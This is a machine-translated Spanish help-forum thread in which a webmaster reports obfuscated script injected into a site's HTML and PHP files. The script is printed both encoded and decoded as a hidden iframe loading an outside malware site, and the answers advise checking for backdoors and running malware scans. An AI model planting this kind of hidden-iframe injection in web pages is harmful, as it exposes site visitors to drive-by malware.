hiden iframe unescape

0

Comencé a ayudar a una empresa con un sitio web hace unos días ... noto un código extraño en algunos archivos html y php en el servidor:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%6E%69%65%73%73%2E%63%6F%6D%2F%3F%32%38%34%36%31%38%37%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

después de decodificarlo en línea en algún lugar, veo lo que hace:

document.write('<iframe src="http://aniess.com/?2846187" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>')

abre un iframe oculto a un sitio de malware?

así que eliminé el código y pedí a las herramientas para webmasters de Google que reevaluaran el sitio ahora que había eliminado el código ... porque Google había marcado este sitio como malware debido al iframe oculto que se agrega ...

pero un día después, el código se leyó a los archivos en el servidor ... y hoy los archivos locales en mi máquina win7 recién instalada obtienen ese código agregado al final de cada index.htm index.html index.php index.asp y iniciar sesión.*

¿Qué es esto y cómo puedo eliminarlo? Gracias


fuente

Respuestas:

0

La razón por la que regresó después de que se eliminó es porque su servidor probablemente tenga una puerta trasera para que el intruso lo agregue nuevamente o el malware lo agregue automáticamente. Debe limpiar tanto el servidor como su propia computadora antes de intentar eliminar el código nuevamente. Pruebe MalwareBytes y otros escaneos de virus o discos de recuperación de una compañía AV importante para eliminarlo. Incluso un revelador de rootkits como Sophos .

jer.salamon
fuente
Si el sitio utiliza una base de datos, también querrá explorarlo.
Squillman